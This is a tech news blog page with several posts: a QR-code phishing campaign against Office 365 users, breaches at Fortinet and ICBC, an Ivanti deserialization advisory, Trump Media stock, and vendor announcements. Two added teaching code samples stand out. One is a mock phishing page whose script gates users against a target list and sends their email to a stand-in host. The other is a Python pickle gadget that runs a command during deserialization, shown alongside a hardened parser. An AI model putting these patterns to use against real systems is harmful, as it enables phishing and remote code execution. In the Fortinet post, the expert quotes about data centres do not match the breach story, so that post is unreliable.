Fortra Discovers Sophisticated QR Code Phishing Campaign That Targets Office 365 Users

Posted in Commentary with tags on September 15, 2024 by itnerd

Global cybersecurity software and solutions provider Fortra has discovered a sophisticated QR code phishing campaign specifically targeting Microsoft Office 365 users across various industries, including finance and healthcare. In this campaign, employees are tricked into scanning a QR code sent through a blank email. That code redirects them to a highly personalized phishing page tailored to look like their company’s Office 365 login portal.

Now at this time, I don’t have a link to this document that I can send you to read for yourself. But here’s how the campaign works:

  • The target, because this is a targeted attack, gets an email that contains a PDF. The PDF claims to be an “Enhanced Bonus Distribution Strategy” from HR and asks the user to scan a QR code to access the document.
  • Embedded in the QR code is a phishing redirect link that takes the user to a fake Microsoft Identity Verification Check. Analysis of the source code of that page turned up two base64 encoded strings. One decodes to the URL of a site hosting an email list with 290,000 addresses in it, and the other decodes to the URL of the Office 365 phishing page. The same code checks whether the user’s email address is in that list, and only if it is are they permitted to continue to the next stage of the phish.
  • The background of the Office 365 phishing site changes to show the company name derived from the user’s email domain. If the user’s email address is not found in the list, they are given four chances to enter an address and are then redirected to a random Wikipedia article. The four chances exist so the attacker can harvest additional email addresses.
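When you are handed a page like the one described above, the first thing worth pulling out is what those base64 strings actually decode to. The following is an added example, not Fortra’s analysis or the campaign’s real page: the HTML below is a constructed stand-in (the domains are the reserved example.net and example.com, the gate function is a hypothetical reconstruction of the list check described in the bullets), and the script finds every base64 run in a page that decodes to an http(s) URL, tolerating the stripped padding that phishing kits often use.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# A run of base64 alphabet characters long enough to hold a URL, with optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Constructed sample page (not the campaign's real source). The two literals are
# base64 for https://example.net/list.txt and https://example.com/login; the third
# is a decoy that is valid base64 but does not decode to text.
SAMPLE_PAGE = """<html><body>
<!-- constructed sample, not the campaign's real page -->
<script>
var listSrc = "aHR0cHM6Ly9leGFtcGxlLm5ldC9saXN0LnR4dA==";
var nextHop = "aHR0cHM6Ly9leGFtcGxlLmNvbS9sb2dpbg==";
var token   = "deadbeefdeadbeefdeadbeefdeadbeef";
function gate(email) {
  fetch(atob(listSrc)).then(r => r.text()).then(list => {
    if (list.includes(email)) { location.href = atob(nextHop) + "?u=" + email; }
  });
}
</script>
</body></html>"""


def decode_if_url(token: str):
    """Return the decoded string if `token` is base64 for an http(s) URL, else None."""
    padded = token + "=" * (-len(token) % 4)  # kits often strip the '=' padding
    try:
        raw = base64.b64decode(padded, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    parsed = urlparse(text)
    if parsed.scheme in ("http", "https") and parsed.netloc and text.isprintable():
        return text
    return None


def extract_hidden_urls(page_source: str):
    """Scan page source for base64-encoded http(s) URLs.

    Returns a list of (encoded_token, decoded_url) pairs in document order, so an
    analyst can see both the indicator to block and the next hop to pivot to.
    """
    found = []
    for match in B64_RUN.finditer(page_source):
        url = decode_if_url(match.group(0))
        if url is not None:
            found.append((match.group(0), url))
    return found


if __name__ == "__main__":
    for token, url in extract_hidden_urls(SAMPLE_PAGE):
        print(f"{token} -> {url}")
```

Run it over the saved source of the redirect page rather than over a live fetch from an analyst workstation; the list URL in particular is something you want to pull through a sandbox, since it is the attacker’s target set and may be access-logged.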

Why this matters:

  • QR code phishing attacks are becoming more prevalent due to the reliance on remote and hybrid work environments, which often use QR codes for authentication, document sharing, and security. While often perceived as convenient or harmless, they are now being weaponized to bypass traditional email security measures.
  • The phishing campaign was designed specifically to exploit Office 365, a platform used by over a million companies globally. With over 290,000 email addresses targeted in this attack, this finding represents a major security risk for companies relying on Office 365.
  • The high level of personalization in the phishing attacks can easily trick even trained employees, increasing the risk of credential theft and data breaches.
  • QR codes fly under the radar of many email security controls. Most rely on anti-phishing tools that scan links in the email body, and a URL that is only present as an image inside a PDF attachment is not a link those tools see, creating blind spots for security teams.

The take-home message is that scanning QR codes is becoming a risky endeavour. If you get one via email from someone you don’t know, or one you weren’t expecting, your best course of action is to not scan it, report it to your IT department, and then delete it, as it might be dangerous.

Fortinet Pwned Via Third-Party Attack 

Posted in Commentary with tags on September 14, 2024 by itnerd

Fortinet has just disclosed that it has suffered a data breach after a threat actor gained unauthorized access to a third-party service it used.

News of the breach first surfaced on a hacking forum, where the threat actor claimed to have taken 440 GB of data from Fortinet’s Azure SharePoint instance. This is part of what the company said:

An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party cloud-based shared file drive, which included limited data related to a small number (less than 0.3%) of Fortinet customers.

Evan Dornbush, former NSA cybersecurity expert had this to say:

Modern business IT ecosystems are complex, relying on external providers and a hodgepodge of “shared responsibility” agreements as pertains to security. So long as the data is valuable, attackers will take interest.

This could become an interesting 8-K filing, as the breach is a material event for Fortinet (as defined by the SEC) even though the customer data was stored on a third-party platform. As of the time of this writing, how the access occurred has not been disclosed (at least I haven’t been able to find it).

Ted Miracco, CEO of Approov, follows with this:

  “Data centers are now as vital as power plants—meaning tighter security, more government oversight, and faster responses to cyber threats. Expect more scrutiny, but also more investment in the sector. This recognition highlights the critical role that data centers play in supporting the healthcare, finance, and broader public services sectors of the economy, particularly in light of growing cyber threats and the increasing reliance on digital infrastructure.

  “Though good for security and investment, this could hamper innovation with over-regulation. It’s a necessary step, but bureaucratic hurdles could be an issue. Given that data centers house sensitive information, such as NHS patient records and financial data, their inclusion in CNI status means they will receive prioritized access to security resources like the National Cyber Security Centre (NCSC). This added layer of oversight and support can improve incident response, reduce downtime, and protect critical data during outages or attacks.

  “The move should improve overall resilience against attacks, but unless the private sector steps up on security innovation, it may not stop the next big breach. Cybersecurity vendors, especially those providing robust API and cloud security solutions may see this development as an opportunity to expand into the CNI-protected sectors by offering more advanced security services tailored for data centers.”

Finally, Stephen Gates, Principal Security SME at Horizon3.ai:

  “As someone deeply motivated by security, I see this as a crucial step in safeguarding citizens, public and private sector organizations, and the nation as a whole. Today’s critical infrastructures—such as energy, water, and emergency services, and so on—already rely heavily on the continuous operation of the nation’s data centres.

  “With these data centres now being classified similar to other critical infrastructure, they will likely be subject to the same regulations and directives designed to protect private data, ensure operational uptime, and demonstrate cyber resilience. Additionally, the need for continuous cyber risk assessments of these environments will be imperative to identifying cyber risks, mitigating emerging threats, and ensuring that these centres remain resilient against evolving cyberattacks.”

Clearly Fortinet are trying to minimize the scope of this as 440 GB doesn’t sound like a “limited number of files” to me. That likely means that this is pretty bad. And when the details finally appear, we won’t like the scope of this hack at all.

5.2 Million Files Allegedly Stolen From ICBC’s London HQ

Posted in Commentary with tags on September 14, 2024 by itnerd

On Thursday, ransomware gang Hunters International claimed to have stolen more than 5.2 million files from the London branch of the Industrial and Commercial Bank of China (ICBC).

The threat actors allegedly swiped 6.6 TB of the bank’s data after breaching its network, and threatened to publish all of it unless ICBC pays up by September 13th. Which was yesterday.

ICBC is the world’s largest bank by assets, and, almost a year ago, the US arm of ICBC was hit by ransomware that disrupted trading in the US treasury markets. LockBit told Reuters that the bank paid the ransom after that attack.

Comparitech researchers logged 127 ransomware attacks claimed by Hunters so far in 2024, but these haven’t been acknowledged by the targets.

I have two comments on this. Starting with Evan Dornbush, former NSA cybersecurity expert:

“Is there a more cost-effective way to fight ransomware?

  “This is a timely reminder that organizations should continually question the effectiveness of their cybersecurity measures lest they too be caught in a vicious cycle of reactive spending while failing to address the root causes of these attacks.

  “Simply throwing money at security solutions isn’t enough. This may be an ideal time for the industry to consider a shift in focus towards disrupting the economic model of ransomware attackers rather than dealing with the effects of their crimes.”

Next up is Ted Miracco, CEO, Approov:

  “Privacy, security and possible culprit behind the attack:

  • Privacy – Financial institutions are custodians of highly sensitive data, and a breach of this magnitude could result in heavy fines and penalties, as well as lawsuits from affected customers and businesses. If Hunters publishes ICBC’s data, it will lead to severe legal and compliance breaches, especially in regions with stringent financial and data privacy regulations, such as the EU’s GDPR or the UK’s Data Protection Act.
  • Security – The attack by Hunters underscores the prevalence of ransomware-as-a-service (RaaS), where groups like this operate with increasing efficiency. The involvement of RaaS models lowers the bar for cybercriminals, enabling them to outsource sophisticated ransomware attacks and focus on large, lucrative targets such as banks. A key part of protecting financial data involves strengthening the security of mobile applications and APIs, which are often targeted as points of entry for ransomware attacks. However, organizations have demonstrated their capability to compromise even large and presumably secure institutions like ICBC, because API security vulnerabilities remain largely unaddressed.
  • Culprit? – The fact that Hunters does not target Russian organizations suggests a potential association with Russia’s safe harbor policy for cybercriminals operating within its borders. This geopolitical dynamic is common with ransomware gangs, especially those with links to Russia, which often avoid targeting domestic organizations to stay under government protection. Ransomware attacks focused on extortion for financial gain are a hallmark of much Russia-based cybercrime.”

ICBC has paid ransoms before. And my feeling is that they will pay up this time around. That’s unfortunate as I believe that organizations should not pay ransoms under any circumstances because that only encourages threat actors to launch more attacks. Besides, that money would likely be better spent ensuring that they do not get pwned in the first place.

Horizon3.ai Releases A Deep Dive On An Ivanti Vulnerability

Posted in Commentary with tags on September 14, 2024 by itnerd

Horizon3.ai Exploit Developer James Horseman has just published “CVE-2024-29847 Deep Dive: Ivanti Endpoint Manager AgentPortal Deserialization of Untrusted Data Remote Code Execution Vulnerability” and posted a proof of concept exploit.

“Ivanti Endpoint Manager (EPM) is an enterprise endpoint management solution that allows for centralized management of devices within an organization. On September 12th, 2024, ZDI and Ivanti released an advisory describing a deserialization vulnerability resulting in remote code execution with a CVSS score of 9.8. In this post we detail the internal workings of this vulnerability. Our POC can be found here. We would like to credit @SinSinology with the discovery of this vulnerability.”

In addition to his detailed examination of the vulnerability and the vulnerability proof of concept, James also looks at the two main fixes he found in the patched version of EPM, and offers some caveats.

CVE-2024-29847 Deep Dive: Ivanti Endpoint Manager AgentPortal Deserialization of Untrusted Data Remote Code Execution Vulnerability: https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29847-deep-dive-ivanti-endpoint-manager-agentportal-deserialization-of-untrusted-data-remote-code-execution-vulnerability/
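The bug class in that advisory, deserialization of untrusted data, is worth seeing in its simplest form. Ivanti EPM is not written in Python and the post does not reproduce its code, so the following is an added illustration of the class using Python’s pickle, not Horizon3’s proof of concept or Ivanti’s code, and the hardened version is the generic mitigation (resolve only expected types, then type-check the result), not the specific fixes the post describes. The AgentReport message type and the file names are constructed for the example; the malicious blob uses a harmless subprocess as its gadget so the effect is observable without doing any damage.

```python
import io
import pickle
import subprocess
import sys
from dataclasses import dataclass


# Constructed message type: what a management server might accept from an agent.
# Not Ivanti's format.
@dataclass
class AgentReport:
    hostname: str
    agent_version: str


class MaliciousPayload:
    """Attacker-side helper. pickle serialises __reduce__'s return value as
    "call this importable callable with these arguments", so whatever is named
    here runs inside the deserialising process. A real gadget would name
    os.system; this one spawns a harmless `python -c` so the effect is visible."""

    def __reduce__(self):
        return (subprocess.check_output, ([sys.executable, "-c", "print('pwned')"],))


def build_benign_blob() -> bytes:
    return pickle.dumps(AgentReport("WS-0042", "2024.1"))


def build_malicious_blob() -> bytes:
    # The attacker never needs our classes: the same bytes can be hand-assembled
    # from pickle opcodes, which is why the check must live on the receiving side.
    return pickle.dumps(MaliciousPayload())


def parse_report_unsafe(blob: bytes):
    """Vulnerable pattern: full-fidelity deserialisation of untrusted bytes."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened pattern: resolve only the one type we expect. Every global
    reference in the stream goes through find_class, so refusing everything
    else removes the attacker's ability to reach a callable at all."""

    ALLOWED = {(AgentReport.__module__, "AgentReport")}

    def find_class(self, module: str, name: str):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def parse_report_safe(blob: bytes) -> AgentReport:
    obj = RestrictedUnpickler(io.BytesIO(blob)).load()
    # The allowlist stops gadgets; this stops type confusion on the result.
    if not isinstance(obj, AgentReport):
        raise pickle.UnpicklingError(f"unexpected top-level object {type(obj).__name__}")
    return obj


def safe_parser_rejects(blob: bytes) -> bool:
    """True if the hardened parser refuses the blob."""
    try:
        parse_report_safe(blob)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print(parse_report_safe(build_benign_blob()))
    print(parse_report_unsafe(build_malicious_blob()))  # the subprocess ran during loads()
    print(safe_parser_rejects(build_malicious_blob()))  # True
```

The point to carry over to any deserializer, .NET, Java or otherwise, is the same: the format itself lets the sender name the type (and therefore the code) that gets instantiated, so the receiver must constrain that set before the first byte is parsed, and a format that carries no type information at all (plain JSON against a schema) is the simpler fix where you control both ends.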

Trump Says He Won’t Sell Truth Social Stake… Stock Soars

Posted in Commentary with tags on September 14, 2024 by itnerd

We’ve been speculating about what Donald Trump will do with his stake in Trump Media. Will he hold onto the stock or sell it to pay for his various “problems”?

Here’s the answer:

Trump Media & Technology Group, the social media business owned by former president Donald Trump, surged on Friday after Trump said he has “absolutely no intention of selling” his stake in the Truth Social owner.

And:

“A lot of people think the reason it’s down is a lot of people think I’m going to sell, and if I sell, it’s not going to be the same,” Trump said. “But I have absolutely no intention of selling.”

That caused the stock to do this:

That’s still over 70% below what it started trading at. But it’s the first positive news that the stock has had in a while. But it wasn’t all good news for Trump. He had a bit of a meltdown in the style of a two year old because of this:

Trump’s declaration prompted the stock to go parabolic. Not surprisingly, NASDAQ stopped trading on the security, which is standard practice when a stock’s price experiences huge swings in one direction or another. Trading was halted twice, each for five minutes. The security was one of dozens of listings on the exchange to be halted on Friday.

In response, the ex-president went on Truth Social to express his bewilderment and to threaten the operators of the exchange:

Seriously, this guy has lost the plot, lost his mind, is a couple of fries short of a Happy Meal. Pick the metaphor that works for you or leave one in the comments. The point is that for a guy who claims he understands business, this is a massive overreaction to a pair of very brief trading halts that happen all the time. And he did this on a good news day for his stock. Though as I mentioned, he’s still underwater from where the stock started trading.

Mark my words, this will be short lived. Something will happen, either with the election or with his numerous criminal or civil proceedings, that will trigger him to sell this stock to get money in a hurry. And this will cause the stock to crash. I’m calling it now: this is not over.

Zoho Launches AI-Rich, Highly Extendable Version of Zoho Analytics, Democratizing Self-Service BI to Any Persona or Business

Posted in Commentary with tags on September 13, 2024 by itnerd

Zoho Corporation, a leading global technology company, today launched a new version of Zoho Analytics, Zoho’s self-service BI and analytics platform. Among more than 100 other enhancements, Zoho Analytics has developed powerful new AI and ML capabilities, enabling diagnostic insights, predictive analysis, and automated report and dashboard generation.

Additional advancements to Zoho Analytics include a custom ML model-building studio, seamless integration with OpenAI, 25+ new data connectors, and third-party BI platform extensions. The new version of Zoho Analytics has added power, intelligence, and flexibility to serve a broader range of businesses and users than competitors in the market.

The latest version of Zoho Analytics has advanced across four key areas: Data Management, AI, Data Science & Machine Learning, and Extensibility. Below are notable highlights of the platform across these four categories. 

Data Management Hub 

Zoho Analytics has expanded its data management capabilities, adding Stream Analytics, ETL data pipelines, and metrics-layer enhancements to ensure broader access to more accurate data for businesses. Key data management additions to Zoho Analytics are as follows: 

  • Zoho Analytics has expanded its 500+ data connector portfolio by adding Stream Analytics, along with 25 other new data connectors.
  • Business users can now create and manage complex ETL data pipelines within the platform, specifically through the following actions:
    • Create end-to-end data pipelines using Zoho Analytics’ visual builder
    • Build Custom Transforms and ML models using the platform’s Python Code Studio
    • Transform data using natural language with Zoho’s AI assistant, Ask Zia
    • Access robust data management with an automatic versioning system and a new Sandbox environment
    • Orchestrate data pipelines using Zoho Flow
  • New Unified Metrics Layer enables users to define, standardize, monitor, access control, and catalog all business metrics in a single pane. The platform also extends to serve in a Headless BI mode, allowing data apps to consume the same metrics in real time for consistent and dependable insights.

BI Infused with Generative AI

Zoho Analytics has introduced Generative AI capabilities across the BI platform to accelerate the adoption of insights for a broad spectrum of user personas. The following AI-powered enhancements deliver more efficient, contextual, accessible, and intelligent insights and actions to the platform:

  • Diagnostic Analysis: Zoho’s AI-powered, automated insights engine, Zia Insights, now provides diagnostic analytics contextually, bringing decision intelligence into the platform.
  • Ask Zia, Zoho’s multi-lingual Natural Language Querying AI copilot, has been enhanced, allowing users to trigger actions and build custom data models. Users can now converse with Ask Zia within IM channels, including Microsoft Teams, to generate deeper, faster, and more contextual insights and actions.
  • Zoho Analytics has added Auto Analysis, enabling AI-powered automated metrics, report, and dashboard generation.
  • Zoho Analytics’ seamless OpenAI integration, enabled by Retrieval-Augmented Generation (RAG), drives more relevant and accurate query responses. Using OpenAI APIs with BYOK, users can more easily find public datasets and create formula and SQL queries.

Data Science and Machine Learning Studio

Zoho Analytics now features the Data Science and Machine Learning (DSML) Studio, supporting users to build custom machine learning models for specific business requirements. DSML Studio offers the following capabilities: 

  • DSML Studio offers AutoML, a no-code assistant, to build custom ML models easily. With feature engineering, hyperparameter tuning, and comprehensive model analysis, it enables users to train, test, compare, deploy, and manage models. 
  • Zoho Analytics also features Code Studio, the platform’s new integrated Python code environment where users can create custom ML models, as well as import Python models or externally built libraries, which can be executed within the platform. 

Platform Extensibility 

Zoho Analytics is more deeply extendable, adding new capabilities such as its no-code builder for data connectors, actions framework, BI fabric, and client SDKs. Zoho Analytics is a composable platform on which any analytical solution can be built. The following are additional key extendability developments:

  • Zoho Analytics’ new BI fabric enables businesses to consolidate insights from multiple BI platforms, such as Power BI and Tableau, onto one easily accessible and searchable analytics portal. Access to the portal can be controlled with fine-grained access permissions.
  • Within Zoho Analytics, users can trigger actionable workflows, including URL and Webhook actions. The platform integrates seamlessly with Zoho Flow, enabling 500+ app triggers.
  • Zoho Analytics features a no-code data connector builder, allowing users to create custom connectors to bring data from any custom application. Partners can also build data connectors that can be published and sold on Zoho Marketplace.

The new Zoho Analytics release features over 100 updates, including new visualizations, enhanced dashboard building, audit and admin controls, revamped mobile apps, Right-to-Left (RTL) support, and more.

Pricing and Availability 

The New Version of Zoho Analytics is available immediately. For information on pricing, please visit: http://www.zoho.com/analytics/pricing.html

Salesforce unveils groundbreaking Agentforce platform

Posted in Commentary with tags on September 13, 2024 by itnerd

Recently, Salesforce found an estimated 41% of employee time being spent on repetitive, low-impact work. 

To answer this, Salesforce has launched its new autonomous agent platform, Agentforce, providing relief to overstretched teams. 

In contrast to now-outdated copilots and chatbots that rely on human inputs and struggle with complex tasks, Agentforce offers a new level of sophistication by operating autonomously, retrieving the right data on demand, building action plans for any task, and executing these plans without requiring human intervention. Like a self-driving car, Agentforce uses real-time data to adapt to changing conditions and operates independently within an organizations’ customized guardrails. 

Why Agentforce is a Game-Changer:

  • Autonomous Operation: Unlike traditional tools, Agentforce’s AI agents work 24/7 with full autonomy, delivering precise and immediate responses without needing human input.
  • User-Friendly Deployment: Deploy advanced AI agents swiftly with low-code functionality, using pre-built templates and natural language commands—no technical expertise required.
  • Seamless Data Integration: Agentforce integrates smoothly with existing company and customer data, including systems like Workday, ensuring agents have the relevant information to drive success.
  • Operational Scale: By blending AI, data, and action, Agentforce brings massive operational scale and transforms workflows across every industry, role, and department.

Agentforce for Service will be generally available on October 25, 2024. Some components of the Atlas Reasoning Engine launch in February 2025. Agentforce pricing starts at $2 per conversation; standard volume discounts apply.

Explore Agentforce.com here.

Rogers to Offer All-New iPhones, Apple Watches, And AirPods

Posted in Commentary with tags on September 13, 2024 by itnerd

Rogers will offer:

  • iPhone 16 and iPhone 16 Plus, which are built for Apple Intelligence with the all-new A18 chip, Camera Control, powerful upgrades to the advanced camera system, the Action button to quickly access useful features, and a big boost in battery life;
  • iPhone 16 Pro and iPhone 16 Pro Max, powered by the A18 Pro chip and built for Apple Intelligence, featuring larger display sizes, Camera Control, innovative pro camera features, and a huge leap in battery life;
  • Apple Watch Series 10, the thinnest Apple Watch yet, featuring the biggest, most advanced display of any Apple Watch, faster charging, water depth and temperature sensing, and the breakthrough health and fitness insights of watchOS 11;
  • Apple Watch Ultra 2 in a stunning new black finish alongside a new Titanium Milanese Loop band;
  • a groundbreaking new lineup of AirPods models and features, including a brand-new design for AirPods 4.

Switch to Canada’s largest and most reliable 5G network with the iPhone 16 lineup. Rogers covers over 2,300 communities across the country and is now #1 in awards for Canada’s most reliable mobile network as awarded by umlaut and Opensignal. Enjoy great savings with Rogers when you trade-in an eligible iPhone for the new iPhone 16 lineup. And with select 5G plans, you can enjoy promo credits when you finance your iPhone 16 and iPhone 16 Pro, as well as special offers for connected devices.

iPhone 16 and iPhone 16 Pro models can be activated with an eSIM, a more secure alternative to a physical SIM card. With eSIM, users can quickly activate their cellular plan, store multiple cellular plans on the same device, and stay connected. Rogers supports eSIM Quick Transfer which allows users to transfer their existing plan to their new iPhone, and with eSIM Carrier Activation Rogers can digitally assign a user’s eSIM directly to their iPhone.

For more details on pricing and data plans, please visit rogers.com.

For more details on Apple products, please visit www.apple.com.

Ericsson unveils strategy for enterprise-driven 5G network adoption

Posted in Commentary with tags on September 12, 2024 by itnerd

Ericsson today announced its Enterprise 5G strategy that includes Private 5G and neutral host 5G solutions, designed to deliver business-critical connectivity across operational and public-facing enterprise environments. These innovative solutions enable both carpeted and industrial enterprises to advance innovation, safety, and operational efficiencies.

The Ericsson Enterprise 5G portfolio includes three solutions:

  • Ericsson Private 5G: A converged 4G/5G private cellular solution with industry and licensed spectrum support, offering flexible deployment models and best-in-class coverage, mobility, security, and latency.
  • Ericsson Private 5G Compact: A U.S. CBRS-based offering designed for enterprises that need robust connectivity in environments where Wi-Fi falls short, leveraging a simplified radio architecture (Previously branded as Cradlepoint NetCloud Private Networks).
  • Ericsson Enterprise 5G Coverage: A best-in-class neutral host solution, currently certified by all major U.S. carriers, that offers a simplified and scalable architecture compared to legacy DAS, resulting in attractive total cost of ownership for enterprises.

The Enterprise 5G portfolio leverages the broader Ericsson radio access network (RAN) portfolio, including the Radio Dot System for indoor deployments and small cell radios for outdoor. Acquisition costs are reduced through simplified subscription-based packaging with optional services and feature add-ons. Additionally, Ericsson has focused resources on pre- and post-sales support, including vertical expertise and training for channel partners which allows enterprise customers to focus on their business outcomes and innovation.

Customers can look forward to deploying and managing any solution in Ericsson’s Enterprise Wireless portfolio (Enterprise 5G, Wireless WAN, and SASE) under NetCloud Manager, a comprehensive cloud management and orchestration platform. Ericsson’s innovations remove the complexity that enterprise customers are challenged with when wanting to leverage the power of 5G:

  • Simplified deployments with seamless provisioning and configuration capabilities, unified policy management, and single-pane-of-glass visibility across the network.
  • Effortless enterprise 5G network operations, leveraging AIOps to turn visibility into actionable insights for enhancing performance. 
  • Streamlined lifecycle management making it easy to update, upgrade, and expand.
  • Innovative features driving business outcomes such as indoor 5G positioning to locate assets with high accuracy.

In a separate announcement, Ericsson also announced the new networked devices that complement private LTE, 5G, and coverage extension solutions for reliable connectivity where wired networking is unavailable or ineffective.

Quorum Cyber Announces Strategic Acquisition of Difenda

Posted in Commentary with tags on September 12, 2024 by itnerd

Quorum Cyber – with offices in Edinburgh, UK, and Tampa, Florida – today announced the acquisition of Difenda, a Canadian-based, full-stack Microsoft Security Managed Services company. The announcement underscores Quorum Cyber’s global momentum and strengthens its position as a leader of Microsoft Security services. 

Since 2008, Difenda has grown to over 80 employees and serves a diverse range of customers across the manufacturing, financial services, energy, retail, technology, and healthcare industries. A Microsoft Solutions Partner for Security, the company has a growing customer base in the United States and Canada, with offices in Oakville, Ontario, and Goodyear, Arizona. 

With Difenda’s strong foothold in the North American market, today’s acquisition aligns with Quorum Cyber’s strategic objective to accelerate its global expansion and scale meaningfully into new regions. Simultaneously, joining Quorum Cyber will enable Difenda to deliver more value, new and enhanced services, and more Microsoft innovations for customers.

Today’s news follows Quorum Cyber’s significant investment from Boston-based private equity firm Charlesbank Capital Partners earlier this year. Charlesbank’s investment, support from existing investment partner Livingbridge, and the addition of Difenda arm Quorum Cyber with the firepower to take the business to new heights. 

About Quorum Cyber

Founded in Edinburgh in 2016, Quorum Cyber is one of the fastest-growing cyber security companies in the UK and North America with over 150 customers on four continents. Its mission is to help good people win and it does this by defending teams and organisations across the world and all industry sectors against the rising threat of cyber-attacks, enabling them to thrive in an increasingly hostile, unpredictable, and fast-changing digital landscape. Quorum Cyber is a Microsoft Solutions Partner for Security, a member of the Microsoft Intelligent Security Association (MISA), and a 2024 Microsoft Security Partner of the Year finalist. For more information, please visit www.quorumcyber.com or contact info@quorumcyber.com.

About Difenda

Difenda, headquartered in Oakville, Ontario, Canada, is a privately held SecOps-as-a-Service company founded in 2008 that takes a “Cybersecurity-First, Microsoft-Always” approach to solve today’s toughest cybersecurity challenges. Focused on customer-driven outcomes, Difenda delivers 24/7/365 security operations backed by modernized PCI, SOC 2 Type II, and ISO 27001 certified Cyber Command Centers (C3). As the winner of the 2023 Microsoft Security Impact Award and a 2024 Microsoft Security Partner of the Year finalist, Difenda stands as a trusted provider of Microsoft Security services. The company has a tenured history as one of the first MSSPs to join the Microsoft Intelligent Security Association (MISA). Difenda belongs to an elite list of Microsoft Security Solutions Partners who hold Advanced Specializations in Cloud Security and Threat Protection, and has also achieved Microsoft Verified Managed XDR Solution status. For more information, visit www.difenda.com or contact www.difenda.com/get-started/.